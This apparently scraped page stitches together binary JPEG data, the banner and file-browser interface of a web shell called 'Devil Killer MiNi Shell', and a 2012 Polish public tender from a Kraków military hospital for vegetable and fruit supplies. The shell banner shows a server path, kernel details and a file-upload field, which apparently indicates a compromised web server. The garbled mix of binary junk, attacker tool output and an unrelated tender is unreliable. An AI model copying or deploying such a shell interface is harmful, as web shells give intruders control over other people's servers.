JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120216/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120216/38655-N-2012.html

<p class="kh_header"><b>Kraków: DOSTAWY WARZYW I OWOCÓW</b><br>
<b>Numer ogłoszenia: 38655 - 2012; data zamieszczenia: 16.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką Samodzielny Publiczny ZOZ , ul. Wrocławska 1-3, 30-901 Kraków, woj. małopolskie, tel. 12 63 08 099, faks 12 63 08 099.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.5wszk.com.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWY WARZYW I OWOCÓW.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot zamówienia winien spełniać wymagania wymienione w obowiązujących przepisach prawa dotyczącego żywności a w szczególności:

1.	Ustawy z dnia 25 sierpnia 2006 r. o bezpieczeństwie żywności i żywienia (D.z. U. Nr 171 poz. 1225)
2.	ustawy z dnia 21 grudnia 2000 r., o jakości handlowej artykułów rolno - spożywczych. (Dz. U. z 2005 r. Nr 187, poz. 1577 ze zm.),
3.	Rozporządzenia (WE) Nr 178/2002 Parlamentu Europejskiego i Rady Ministra dnia 28 stycznia 2002 r. ustalające ogólne zasady i wymagania prawa żywnościowego, powołujące Europejski Urząd ds. bezpieczeństwa żywności oraz ustanawiające procedury w zakresie bezpieczeństwa żywności,
4.	Rozporządzenia (WE) Nr 1935/2004 Parlamentu Europejskiego i Rady z dnia 27 października 2004 r. w sprawie materiałów i wyrobów przeznaczonych do kontaktu z żywnością oraz uchylające Dyrektywy 80/590/EWG i 89/109/EWG,
5.	Rozporządzenie Komisji (WE) nr 790/2000 z dnia 14 kwietnia 2000 r. ustanawiające norm handlowe w odniesieniu do pomidorów z późniejszymi zmianami.
6.	Rozporządzenie Komisji (WE) nr 1881/2006  z dnia 19 grudnia 2006 r. ustalające najwyższe dopuszczalne poziomy niektórych zanieczyszczeń w środowisku spożywczym (Dz. U. L 364 z 20.12.2006, s 5 z późn. zm.).
7.	Rozporządzenie (WE) Nr 396/2005 parlamentu Europejskieo i Rady z dnia 23 lutego 2005 r. w sprawie najwyższych dopuszczalnych poziomów pozostałości pestycydów w żywności i paszy pochodzenia roślinnego i zwierzęcego oraz na ich powierzchni, zmieniające dyrektywę Rady 91/414/EWG (Dz. U. L 70 z 16.03.2005, s. 1 z późn. zm.)
 
PAKIET nr I. Warzywa całoroczne


LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)  	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ziemniaki jadalne                          (opakowanie zbiorcze 30 kg)	03212100-1	1 960 op.				
2.	Burak ćwikłowy
(opakowanie zbiorcze 15 kg)	03221111-7	 430 op.				
3.	 Marchew świeża
(opakowanie zbiorcze 10 kg)	03221112-4	1700 op.				
4.	Kapusta biała-świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	   34 op.				
							
5.	Kapusta czerwona-świeża, 
(opakowanie zbiorcze 25 kg) 	03221410-3	    30 op.				
6.	Kapusta włoska- świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	    25op.				
7.	Kapusta pekińska 
(opakowanie zbiorcze 15 kg)
	03221410-3	35 op.				
							
8.	Seler świeży,
(opakowanie zbiorcze 10 kg) 	03221120-3
	  740op.				
9.	Por świeży,
(opakowanie zbiorcze 5 kg)	03221300-9	  180 op.				
10.	Cebula świeża,
(opakowanie zbiorcze 15 kg)	03221113-1	  100 op.				
11.	Pietruszka świeża-korzeń,
(opakowanie zbiorcze 10 kg)	03221`110-0	  720 op.				
12.	Czosnek świeży,
(opakowanie zbiorcze 2 kg)	03221120-3	  60 op.       				
13.	Pieczarka uprawna świeża                    (opakowanie zbiorcze 4kg)	03221260-6	 120op.				
	RAZEM						

PAKIET nr II. Warzywa - kiszonki


LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)  	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ogórki kwaszone 
(opakowanie zbiorcze - wiadro plastikowe 3 kg)	13221270-9	    400 op.				
2.	Kapusta kwaszona 
(opakowanie zbiorcze - wiadro plastikowe 15 kg)	15331142-4	    75 op.				
	RAZEM						

PAKIET nr III. Warzywa sezonowe

LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (kg.)	kwota netto
za j.m. (kg.)	wartość netto
	VAT	wartość brutto
1.	Fasolka szparagowa świeża kl. I	03221212-5	280 kg				
2.	Pomidory świeże kl. I	03221240-0	500 kg				
3.	Ogórki świeże kl. I	03221270-9	270 kg				
4.	Sałata głowiasta kl. I	03221310-2	1350szt				
5.	Kalafior świeży kl. I	03221420-6	500 szt.				
6.	Brokuł świeży kl. I	03221420-6	800 szt.				
7.	Rzodkiewka kl. I 	03221110-0	120 kg				
8.	Natka pietruszki świeża	03221300-9	110 kg				
9.	Koper zielony świeży	03221300-9	150 kg				
10.	Szczypior świeży	03221300-9	10 kg				
	RAZEM						

PAKIET nr IV. Owoce krajowe
Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto
	VAT	wartość brutto
1.	Jabłko konsumpcyjne,
(opakowanie zbiorcze 15 kg)	03222321-9	740 op.				
	RAZEM						

PAKIET nr V. Owoce cytrusowe
LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (Kg.)	kwota netto
za j.m. (Kg.)	wartość netto
	VAT	wartość brutto
1.	Pomarańcza                                                                 /waga 1 szt. = około250g/, (opakowanie zbiorcze 5 - 10kg)	03222220-1	800 kg				
2.	Grapefruit                                          /waga 1 szt. = około 400g/,                                                               (opakowanie zbiorcze 9- 18 kg	03222230-4	700 kg				
3.	Mandarynka                                                                                               /waga 1 szt. = około150 g/,                                                                      (opakowanie zbiorcze 4.5 - 12kg)		50 kg				
4.	Cytryna                                                                           (opakowanie zbiorcze 1 - 5 kg)	03222210-8	110 kg				
	RAZEM.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> NIE DOTYCZY</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie Zamówienia mogą się ubiegać wykonawcy, którzy przedłożą zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 roku w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzenia zakładów produkcyjnych lub wprowadzających do obrotu żywność, podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. z 20007 t. Nr 106, poz. 730), - jeżeli dotyczy.
Warunek ten zostanie uznany za spełniony jeżeli Wykonawca przedłoży zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 roku w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzenia zakładów produkcyjnych lub wprowadzających do obrotu żywność, podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. z 20007 t. Nr 106, poz. 730), - jeżeli dotyczy.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie Zamówienia w zakresie dysponowania odpowiednim potencjałem technicznym mogą ubiegać się wykonawcy, którzy posiadają środek transportu przeznaczony do przewozu artykułów żywnościowych, z uwzględnieniem atestowanej windy do transportu euro-palet.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W zakresie warunku dotyczącego sytuacji ekonomicznej, o udzielenie zamówienia mogą się ubiegać wykonawcy, posiadający polisę ubezpieczeniową od odpowiedzialności cywilnej (deliktowej) z rozszerzonym zakresem ubezpieczenia od odpowiedzialności cywilnej ubezpieczonego za szkody osobowe lub rzeczowe wyrządzone przez produkty dostarczone przez Sprzedającego o sumie gwarancyjnej nie niższa niż wartość składanej oferty. 
W zakresie warunku dotyczącego sytuacji finansowej, Zamawiający nie określił szczegółowo sposobu dokonywania oceny spełnienia warunku udziału w postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Wypełniony FORMULARZ OFERTOWY - według ZAŁĄCZNIKA NR 2 do SIWZ.
2.	Podpisany i wypełniony we wskazanych miejscach FORMULARZ CENOWY - OPIS PRZEDMIOTU ZAMÓWIENIA - według ZAŁĄCZNIKA NR 1 do SIWZ.
3.	Pełnomocnictwo do podpisania oferty w toczącym się postępowaniu (pełnomocnictwo do zaciągania zobowiązań w imieniu Wykonawcy), dołączone do oferty, o ile nie wynika z innych dokumentów, załączonych przez Wykonawcę. 
4.	Oświadczenie Wykonawcy, w trybie art. 44 ustawy, dotyczące spełnienia warunków udziału w postępowaniu, zgodnie z art. 22 ustawy, ściśle według formularza stanowiącego ZAŁĄCZNIK NR 3 do SIWZ, a także ZAŁĄCZNIK NR 3A i co za tym idzie pisemne celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia (o ile dotyczy).
5.	Oświadczenie Wykonawcy dotyczące niepodlegania wykluczeniu ściśle według formularza stanowiącego ZAŁĄCZNIKIEM NR 4 do SIWZ. 
6.	Aktualny odpis z właściwego rejestru w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt. 2 ustawy wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, jeżeli odrębne przepisy wymagają wpisu do rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają zgłoszenia do ewidencji działalności gospodarczej - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
7.	Zaświadczenie o wpisie do rejestru zakładów zgodne z rozporządzeniem Ministra Zdrowia z dnia 29 maja 2007 roku w sprawie wzorów dokumentów dotyczących rejestracji i zatwierdzenia zakładów produkcyjnych lub wprowadzających do obrotu żywność, podlegających urzędowej kontroli Państwowej Inspekcji Sanitarnej (Dz. U. z 20007 t. Nr 106, poz. 730), - jeżeli ustawa nakłada obowiązek posiadania takich uprawnień.
8.	Wykonawca mający siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentu, o którym mowa w pkt 6 składa odpowiedni dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
c)	zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust.1 pkt 4-8 ustawy pzp - dokument wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
9.	Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt 8, zastępuje się je dokumentem zawierającym oświadczenie Wykonawcy złożone przed notariuszem, właściwym organem sądowym, administracyjnym, albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania - w zakresie dat wystawienia dokumentów, przepisy punktu 8 stosuje się odpowiednio.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Kupujący przewiduje możliwość zmiany umowy w stosunku do treści oferty na podstawie której dokonano wyboru Sprzedający,  jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć  w chwili zawarcia umowy lub zmiany te są korzystne dla Kupującego, a także dotyczą: 
1)	zmiany świadczenia Sprzedającego na świadczenie lepszej jakości przy zachowaniu tożsamości przedmiotu zamówienia,
2)	wydłużenia terminu wykonania umowy z powodu okoliczności niezależnych od Sprzedającego,
3)	zmiany danych Sprzedającego ( np. zmiana siedziby, adresu, nazwy),
4)	wydłużenia czasu trwania umowy w sytuacji niewykorzystania przez Kupującego przedmiotu umowy, przy zachowaniu jej wartości ( nie dłużej niż o 2 miesiące),
5)	obniżenia cen,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.5wszk.com.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> 5 Wojskowy Szpital Kliniczny z Polikliniką - Samodzielny Publiczny Zakład Opieki Zdrowotnej 30 - 901 Kraków, ul. Wrocławska 1-3...</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 24.02.2012 godzina 11:00, miejsce: 5 Wojskowy Szpital Kliniczny z Polikliniką - Samodzielny Publiczny Zakład Opieki Zdrowotnej 30 - 901 Kraków, ul. Wrocławska 1-3 - Kancelaria Szpitala..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> PAKIET nr I. Warzywa całoroczne.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)  	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ziemniaki jadalne                          (opakowanie zbiorcze 30 kg)	03212100-1	1 960 op.				
2.	Burak ćwikłowy
(opakowanie zbiorcze 15 kg)	03221111-7	 430 op.				
3.	 Marchew świeża
(opakowanie zbiorcze 10 kg)	03221112-4	1700 op.				
4.	Kapusta biała-świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	   34 op.				
							
5.	Kapusta czerwona-świeża, 
(opakowanie zbiorcze 25 kg) 	03221410-3	    30 op.				
6.	Kapusta włoska- świeża 
(opakowanie zbiorcze 25 kg)	03221410-3	    25op.				
7.	Kapusta pekińska 
(opakowanie zbiorcze 15 kg)
	03221410-3	35 op.				
							
8.	Seler świeży,
(opakowanie zbiorcze 10 kg) 	03221120-3
	  740op.				
9.	Por świeży,
(opakowanie zbiorcze 5 kg)	03221300-9	  180 op.				
10.	Cebula świeża,
(opakowanie zbiorcze 15 kg)	03221113-1	  100 op.				
11.	Pietruszka świeża-korzeń,
(opakowanie zbiorcze 10 kg)	03221`110-0	  720 op.				
12.	Czosnek świeży,
(opakowanie zbiorcze 2 kg)	03221120-3	  60 op.       				
13.	Pieczarka uprawna świeża                    (opakowanie zbiorcze 4kg)	03221260-6	 120op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> PAKIET nr II. Warzywa - kiszonki.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość /j.m. (op.)  	kwota netto
za j.m. (op.)	wartość netto

	VAT	wartość brutto
1.	Ogórki kwaszone 
(opakowanie zbiorcze - wiadro plastikowe 3 kg)	13221270-9	    400 op.				
2.	Kapusta kwaszona 
(opakowanie zbiorcze - wiadro plastikowe 15 kg)	15331142-4	    75 op..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> PAKIET nr III. Warzywa sezonowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> LP.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (kg.)	kwota netto
za j.m. (kg.)	wartość netto
	VAT	wartość brutto
1.	Fasolka szparagowa świeża kl. I	03221212-5	280 kg				
2.	Pomidory świeże kl. I	03221240-0	500 kg				
3.	Ogórki świeże kl. I	03221270-9	270 kg				
4.	Sałata głowiasta kl. I	03221310-2	1350szt				
5.	Kalafior świeży kl. I	03221420-6	500 szt.				
6.	Brokuł świeży kl. I	03221420-6	800 szt.				
7.	Rzodkiewka kl. I 	03221110-0	120 kg				
8.	Natka pietruszki świeża	03221300-9	110 kg				
9.	Koper zielony świeży	03221300-9	150 kg				
10.	Szczypior świeży	03221300-9	10 kg				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> PAKIET nr IV. Owoce krajowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Lp.	Szczegółowa nazwa przedmiotu zamówienia
(charakterystyka, wymiary  itp.)	Kod CPV	Ilość/j.m. (op.)	kwota netto
za j.m. (op.)	wartość netto
	VAT	wartość brutto
1.	Jabłko konsumpcyjne,
(opakowanie zbiorcze 15 kg)	03222321-9	740 op.				
	RAZEM.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 03.11.00.00-5.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
